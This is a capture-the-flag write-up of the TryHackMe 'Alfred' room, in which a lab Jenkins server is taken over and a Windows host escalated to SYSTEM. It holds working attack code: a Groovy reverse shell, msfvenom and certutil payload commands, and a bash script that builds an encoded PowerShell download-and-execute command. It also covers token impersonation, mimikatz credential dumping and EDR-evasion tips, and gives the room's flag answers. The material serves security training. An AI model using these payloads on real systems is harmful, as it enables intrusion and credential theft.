Alfred - TryHackMe
10 min read
Published at: Feb 16, 2024
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
Metadata
Meta
- Room name: Alfred
- URL: https://tryhackme.com/room/alfred
Goal
Learn how to exploit common misconfigurations, mainly with the Nishang tool - and then escalate privileges.
Cheat Sheet
Before we begin, as always there is a generic Cheat Sheet for this room which could be integrated in your own notes. You find it at at the bottom of this write-up. You can also find all of my notes at https://hailstormsec.com/posts/categories/notes.
Tasks
Task 1 - Initial Access
Questions(s)
- How many ports are open? (TCP only)
- What is the username and password for the login panel? (in the format username:password)
- What is the user.txt flag?
If you've read my write-ups before you know I like to scan in at least two stages - an initial scan and a narrow scan.
Initial scan:
sudo nmap -p- -v
Add -Pn
if windows machine
Narrow secondary scan:
sudo nmap -v -A -sC --script vuln -p PORTS
The narrow scan found a robots.txt file for the 8080 port - but it is useless.
We begin to look at the two web servers on port 80 and 8080.
Port 80:
Not super interesting - maybe the email could be used later...
Port 8080:
This is however interesting... if we find out the login we will have access to the Jenkins panel!
We can start by googling the default credentials for Jenkins:
From this a good way to start is by trying 'admin' as the username - however the login panel doesn't seem to generate a new response if you only have the correct username (assuming admin is the username).
In my case I just tried a handful of passwords before finding the right one admin:admin
- however if you struggle you can default to Hydra or Burp Intruder (or similar tool).
Now we want to find a way to execute stuff on the server. The logical place to find this is under 'Manage Jenkins', and there we go!
This is looking real promising! A simple google search later leads me to this article with a plethora of ways to abuse this functionality. I went for a simple reverse shell to the server:
String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
To catch the shell in metasploit I used:
msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4444;run'
Now all you have to do is press run!
Unfortunately we cannot instantly upgrade the shell to a meterpreter and have to do it the manual way of generating a payload and upload it to the server.
Generate payload:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe
Download the payload (certutil is installed on default):
certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe
Start a handler:
msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4443;set payload windows/x64/meterpreter/reverse_tcp;run'
And execute the payload .\meterpreter.exe
!
Bonus ways of getting access
In the process of finding the way that I did, I also found a metasploit module and a way to instantly get a meterpreter shell. There is also what I assume is the intended way to do it
- Metasploit:
use exploit/multi/http/jenkins_script_console
- Then I found this article which I kept building upon. It uses a powersploit module to send back a payload. See the script bellow. Note: I never managed to recieve the shell back due to the server timing out. I suspect the issue is the server resources since it successfully downloaded the payload.
#!/bin/bash
# meterpreter ip & port
lhost=10.14.46.99
lport=4444
echo " * Writing Payload"
cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Command"
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')"
echo $scriptblock
echo
echo " * Encoding command"
encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"
echo $encode
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo
echo " * Final command"
echo $command
echo
echo " * Groovy command "
echo " def process=\"$command\".execute();"
echo " println(\"\${process.text}\"); "
echo
echo " * Starting HTTP Server to serve payload"
python3 -m http.server
- The proper way to do it - there is another way to communicate with the server on the Jenkins web-application:
Now you just have to host the powershell payload provided (
python3 -m http.server
) and a handler to catch the shell (either via metasploituse exploit/multi/handler
or netcat).
Now with a meterpreter shell, we can just read the user flag:
Answers(s)
- 3
- admin:admin
- 79007a09481963edf2e1321abd9ae2a0
Task 2 - Switching Shells
Question(s)
What is the final size of the exe payload that you generated?
I accidentally did this in the last task with the same payload - so I just entered the final size and jumped to the next task.
Answer(s)
73802
Task 3 - Privilege Escalation
Windows uses token-based permissions and applied (usually by lsass.exe) when users log in/authenticate.
This access token consists of:
- User SIDs (security identifier)
- Group SIDs
- Privileges
- And more...
Two types of access tokens:
- Primary access tokens: those associated with a user account that are generated on log on
- Impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process. Think similar to how SUID-bits work in Linux. Levels of impersonation token:
- SecurityAnonymous: current user/client cannot impersonate another user/client
- SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
- SecurityImpersonation: current user/client can impersonate the client's security context on the local system
- SecurityDelegation: current user/client can impersonate the client's security context on a remote system
Distinguish impersonated token to primary
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There's more reading here. To list privileges: whoami /priv
Question(s)
- Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators' token. What is the output when you run the getuid command?
- Read the root.txt file located at
C:\Windows\System32\config
We begin listing our privileges:
Comparing to what we have just learned - two common exploited privileges are:
- SeImpersonatePrivilege
- SeDebugPrivilege Which we both have enabled.
If both of these are enabled we can [load/use] incognito
in the meterpreter and use any impersonation token:
Meterpreter modules
To list all modules you can load, simply type load
and then press tab twice. After you've loaded a modules, you will find all the commands at the bottom of the help
command.
Even though we are impersonated as `NT AUTHORITY\SYSTEM` we may still not have elevated privileges due to how windows can use the primary access token. To make sure we have the correct privilege we can migrate process: `migrate -N services.exe`. Now if successful - we can access the root folder and read the final flag:
BONUS:
Get all the credentials on the system, we can load the kiwi (mimikatz) module:
Now we can compare the hashdump (no module required) vs the mimikatz outputs:
Answer(s)
NT AUTHORITY\SYSTEM
- dff0f748678f280250f25a45b8046b4a
Cheat Sheet
Nmap
Initial port scan:
sudo nmap -p- -v
Add -Pn
if windows machine
Narrow secondary scan:
sudo nmap -v -A -sC --script vuln -p PORTS
Payloads
Msfvenom: Reverse meterpreter shell:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe
Groovy:
String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/
#!/bin/bash
# meterpreter ip & port
lhost=10.14.46.99
lport=4444
echo " * Writing Payload"
cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Command"
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')"
echo $scriptblock
echo
echo " * Encoding command"
encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"
echo $encode
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo
echo " * Final command"
echo $command
echo
echo " * Groovy command "
echo " def process=\"$command\".execute();"
echo " println(\"\${process.text}\"); "
echo
echo " * Starting HTTP Server to serve payload"
python3 -m http.server
Living of the Land (LOL/LotL)
What is LOL?
Living of the Land, or LOL/LotL, is when instead of uploading your own tools to the targeted machine - you utilise what's there by default to accomplish the same goals. This will highly reduce the odds of you pulling any alarmbells from the EDR-system.
Download file:
certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe
Host webserver
python -m http.server [--bind 0.0.0.0 <port>]
Privileges in Windows
Windows uses token-based permissions and applied (usually by lsass.exe) when users log in/authenticate.
This access token consists of:
- User SIDs (security identifier)
- Group SIDs
- Privileges
- And more...
Two types of access tokens:
- Primary access tokens: those associated with a user account that are generated on log on
- Impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process. Think similar to how SUID-bits work in Linux. Levels of impersonation token:
- SecurityAnonymous: current user/client cannot impersonate another user/client
- SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
- SecurityImpersonation: current user/client can impersonate the client's security context on the local system
- SecurityDelegation: current user/client can impersonate the client's security context on a remote system
Distinguish impersonated token to primary
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There's more reading here. To list privileges: whoami /priv
Meterpreter
Modules:
[load/use] <module-name>
Meterpreter modules
To list all modules you can load, simply type load
and then press tab twice. After you've loaded a modules, you will find all the commands at the bottom of the help
command.
Migrate service:
migrate <PID>
migrate -N <process-name>
Support me
Thank you so much for reading and I hope you found it inspirational or helpful! You can best support me by doing any of the following bellow!
- Turn off Adblocker: A simple yet impactful way to support me for free.
- Sign Up: If you haven't already, consider signing up to get access to more content and receive optional newsletters.
- Buy Premium: Explore the Premium option for additional perks and exclusive content.
- Give a Tip: Your generosity is always very appreciated.
You can read more about the perks of being a Member or Subscriber here.
Additionally, you can stay updated and engage with me on social media: